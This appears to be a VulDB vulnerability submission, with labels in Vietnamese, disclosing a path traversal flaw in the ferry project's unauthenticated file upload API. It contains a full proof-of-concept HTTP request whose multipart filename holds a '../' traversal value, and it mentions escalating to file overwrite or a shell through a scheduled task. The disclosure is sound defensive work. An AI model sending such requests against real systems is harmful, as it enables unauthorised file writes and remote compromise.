| tiêu đề | A path traversal problem in the ferry system |
|---|
| Mô tả | Hi, I found a path traversal problem in the ferry system ,in apis/public/file.go file
This UploadFile function concatenates the file name passed by the front end
`singleFile := saveFilePath + guid + "-" + files.Filename`
file address:(https://github.com/lanyulei/ferry/blob/master/apis/public/file.go)
This files.Filename will not do special symbol processing before golang17 version
For example: I use the golang16 version to build this system, when the front end assigns the value of Filename to ../../../../path/filename, I will be able to upload files to any directory
Here's what I've tested locally:
---------------------------------------------------------------------------------------------------------------------------------------
POST /api/v1/public/uploadFile HTTP/1.1
Host: 127.0.0.1
Content-Length: 299
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRv6JRuiMrXQRi8ov
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close
------WebKitFormBoundaryRv6JRuiMrXQRi8ov
Content-Disposition: form-data; name="file"; filename="/../../go (1).mod“
Content-Type: video/mpeg
module gindemo
go 1.16
require (
github.com/gin-contrib/static v0.0.1
github.com/gin-gonic/gin v1.7.7
)
------WebKitFormBoundaryRv6JRuiMrXQRi8ov--
---------------------------------------------------------------------------------------------------------------------------------------------------------------
The value of this filename has been modified. At this point, I can successfully upload the file to the previous directory
According to the deployment situation, I can overwrite his configuration file or upload it directly to the scheduled task bar to get a shell, and this interface is an interface that does not require authentication
project address:https://github.com/lanyulei/ferry
Restriction: We must deploy this service after version 17 of go, and this system also supports this version
How to fix: Randomly name the file when uploading
Thanks for your review |
|---|
| Người dùng | qsec (UID 33968) |
|---|
| Đệ trình | 07/11/2022 08:23 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 11/11/2022 07:50 (4 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 213446 [lanyulei ferry API apis/public/file.go Tệp tin duyệt thư mục] |
|---|
| điểm | 17 |
|---|